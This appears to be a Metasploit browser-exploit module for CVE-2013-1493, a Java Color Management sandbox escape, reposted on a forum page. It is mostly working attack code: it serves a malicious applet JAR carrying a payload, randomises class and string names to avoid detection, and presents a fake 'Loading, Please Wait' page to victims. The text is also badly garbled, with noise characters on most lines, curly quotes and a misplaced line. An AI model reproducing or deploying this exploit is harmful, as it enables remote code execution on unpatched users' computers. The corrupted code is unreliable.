##. F/ F$ I5 o: `) I' S8 b
9 E) G- \% R E% h$ @/ f [
# This file is part of the Metasploit Framework and may be subject to/ o) \3 F8 v! T# ~/ x% \0 a# p
# redistribution and commercial restrictions. Please see the Metasploit; E- F3 M8 J5 z" {6 [
# web site for more information on licensing and terms of use.4 r* a# e/ v m7 I3 l
# http://metasploit.com/% K5 z7 z$ p7 h7 |" U J% w. N: f: ]
##
8 u: P# x |0 x9 V8 X' ]( a8 p; Crequire ‘msf/core’0 k4 j& ~% o9 W% }; ^ E V. k: L
require ‘rex’
- t. Z4 x- V4 c8 y7 e& W8 u+ j; ~class Metasploit3 < Msf::Exploit::Remote
8 T: j# {# x- S8 f# m" F6 CRank = NormalRanking; e; \5 u8 x0 c! B
include Msf::Exploit::Remote::HttpServer::HTML6 Y8 L, q4 Y5 v% V" E
include Msf::Exploit::EXE
: n ?) ?' A* i' U9 tinclude Msf::Exploit::Remote::BrowserAutopwn/ h/ z9 o' D$ g
autopwn_info({ :javascript => false })( [2 g3 \9 `! `$ h
def initialize( info = {} )
2 D- d! L( C+ C- ^& F9 [+ ssuper( update_info( info,2 Z& `0 D4 _# {5 V+ b
‘Name’ => ‘Java CMM Remote Code Execution’,! o7 D8 T" g H/ n9 S+ @) t
‘Description’ => %q{5 X0 z( ~) L9 H. ]- p
This module abuses the Color Management classes from a Java Applet to run
H2 M) p% E, o* A7 }+ |arbitrary Java code outside of the sandbox as exploited in the wild in February+ }* R! x* @# {8 d4 }. q0 r1 G
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
e7 S) [$ K& `& a8 M* Iand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
9 C. x/ ^& }4 l/ C% ^+ Tsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java F1 o9 a4 j, N
warning in order to run the malicious applet.
4 y: [5 f( V" H2 o+ j, M},
$ j( Z/ g( [- S1 V' {- e3 \‘License’ => MSF_LICENSE,, w2 `2 M6 U1 {: ]% _2 f
‘Author’ =>
' O+ w2 P$ }3 E9 l9 U9 m. b) D$ M'Unknown', # Vulnerability discovery and Exploit
5 N3 J9 q% N& R; Q0 z+ B% X" Z'juan vazquez' # Metasploit module (just ported the published exploit)7 U( _/ q3 l+ X1 J. |) C2 X8 ~
],
9 ]6 q5 n, f0 G( j2 g‘References’ =>/ s3 g( W" I7 [/ H1 S; Y1 D. x
[
( |- V8 S( k; U4 O- A2 r. `$ O$ C[ 'CVE', '2013-1493' ],
~' u: C( y( [3 @! u' ^+ A[ 'OSVDB', '90737' ],
) G! Q0 F. s9 q& c. C6 Z6 I[ 'BID', '58238' ],
" H! E5 |% ^+ S9 l" N[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],% r+ ~; }3 V0 o/ ^7 K; \) }
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ], z/ {! J4 ^1 X2 |1 ^
[ 'URL', 'http://pastie.org/pastes/6581034' ]0 f0 t- M$ D$ j1 x' @. `0 p! R# m
],5 y4 D! Z y' r0 {( u( C
‘Platform’ => [ 'win', 'java' ],9 n5 l" ?* r! X' N
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
+ W0 g. n: T" s' K ^* e‘Targets’ =>
; y; ]7 b1 [9 q7 _[, b7 h, u2 U* H- p: A2 ?7 v
[ 'Generic (Java Payload)',: f" I! l9 F. ~. \+ o- _2 O# m2 u
{& G* m% y1 J, D4 I: g( n5 x, F+ v
'Platform' => 'java',8 i" O* w U# p1 t' x( |1 k
'Arch' => ARCH_JAVA( k# w% z& R+ V: h' |
}/ s8 b$ O$ T0 M: t% @- {* m/ Y/ n
],
& y$ O: [* B/ s! y5 J[ 'Windows x86 (Native Payload)',& D2 }" w4 }4 W7 w, I# G
{# V- v& z+ |% @ t/ j
'Platform' => 'win',
0 H) \% B7 U) g9 O) n/ @+ R) Y'Arch' => ARCH_X86
9 t4 {* q8 _4 j; W}
- z1 S# a) ^% z( c' s]
, A$ D" r$ Z' D) u2 T],* }4 ^$ z6 i1 u6 V( {* C/ ?3 {
‘‘DisclosureDate’ => ‘Mar 01 2013′
, V4 a$ A4 t. t8 k" [3 L0 @9 |( t))
" C1 A% ]/ D7 R7 Wend
/ p- E: v5 D/ f( \( }def setup5 F+ [2 v3 E% t4 g/ V2 l. `
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
( E3 n( s3 m8 z7 q@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }* w* J. A" [: }8 L+ D
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
1 a4 x. S9 l# S* M@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }+ Y5 u, D' r: S0 U2 G+ o
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)2 ?% V, [4 D$ M
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }+ S% r+ h6 V$ n$ R
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)" h0 ?: Q$ n, O. i7 L
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }3 U: L( n: D( p% t7 f, X8 |
@init_class_name = rand_text_alpha(“Init”.length)
0 k" C- D; G) n9 Q@init_class.gsub!(“Init”, @init_class_name)' r( x2 }* \3 j3 K" q
super
6 {) E, v# h& e9 @end
8 u, j) g+ X& N' N/ Udef on_request_uri(cli, request)
) z8 H4 B% Z" ]/ X8 x9 y1 hprint_status(“handling request for #{request.uri}”)
/ N3 L9 i4 e$ k3 t6 L+ ^case request.uri2 o. t6 ^6 t Q4 y9 [! @1 ~
when /\.jar$/i6 X8 j; H- E* N7 E1 s: U( i
jar = payload.encoded_jar( I6 B' }1 G. y, T) c: Z' W6 N5 d
jar.add_file(“#{@init_class_name}.class”, @init_class)
) [9 j0 ?: g9 {+ |9 L* qjar.add_file(“Leak.class”, @leak_class)
0 ~% u9 d8 [; H9 a2 j; S, e; ~5 Ijar.add_file(“MyBufferedImage.class”, @buffered_image_class)6 l3 ]& q3 R' Z4 H) T. n7 g4 v; B
jar.add_file(“MyColorSpace.class”, @color_space_class)
3 q2 ^( E4 C% X# q$ M# |, FDefaultTarget’ => 1,
, l3 W8 r- J/ M. l+ R' V( J9 t+ j6 |metasploit_str = rand_text_alpha(“metasploit”.length)3 c) Q7 Q3 U/ y6 j& C( b c5 b
payload_str = rand_text_alpha(“payload”.length)
4 F, P* ]) D, q. O+ ?jar.entries.each { |entry|
8 n+ D' v% ^5 X1 y+ t4 \/ t# Rentry.name.gsub!(“metasploit”, metasploit_str)$ s% t- U" l, [% r+ E8 ]" o
entry.name.gsub!(“Payload”, payload_str): Z6 a+ j7 @# G% `8 h3 Q) m
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
; i! p# v8 x2 a. }9 ^0 ientry.data = entry.data.gsub(“Payload”, payload_str)* R9 {. l8 P* }" \+ q' E# W
}" w; e6 Z; T7 w8 U4 `! K0 M
jar.build_manifest
! m' Z n8 w. T9 O: psend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
$ X" f( y9 v& T/ xwhen /\/$/
% _$ e, q% a; K( R9 K# @0 \1 ~payload = regenerate_payload(cli)7 C" s, ?4 F B$ C
if not payload
4 q* [ h' x3 R3 x" yprint_error(“Failed to generate the payload.”)0 J, k* A2 M# x; }! Y
send_not_found(cli)
8 ~6 X, _+ ?) G) m# |* j0 yreturn0 @4 l& N. C- E
end3 T+ M0 C) S: t% O! e$ `- M1 ~- n7 }* x
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
5 O2 s" k% T7 D! v0 T# `# e' a2 melse
3 A3 X0 O* w* V; z8 W' E/ I7 osend_redirect(cli, get_resource() + ‘/’, ”)
4 B3 F* H' P* @ f9 v; i- o8 N1 xend
& F+ i( j/ Y) W0 K% ~end
$ M0 x1 f1 b0 |( L/ ddef generate_html
1 J& Y9 z" Q2 u3 Ohtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
3 Y% C; e1 p6 ~& C1 E$ x/ S- Jhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|8 `" `1 `# p+ A0 ~
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|4 b& W/ \) M0 T& M6 x$ W d
html += %Q|</applet></body></html>|- c0 s/ R" p" w% A
return html
5 ^: H* T1 x; ~) e1 A) Cend& L' V! U1 }5 W) C' s" v
end
* b, X: r$ x2 y1 v; }( s. Mend
5 ?( A- I: A( c' ]- D |
发表于 2013-4-4 17:31:17
收藏
支持
反对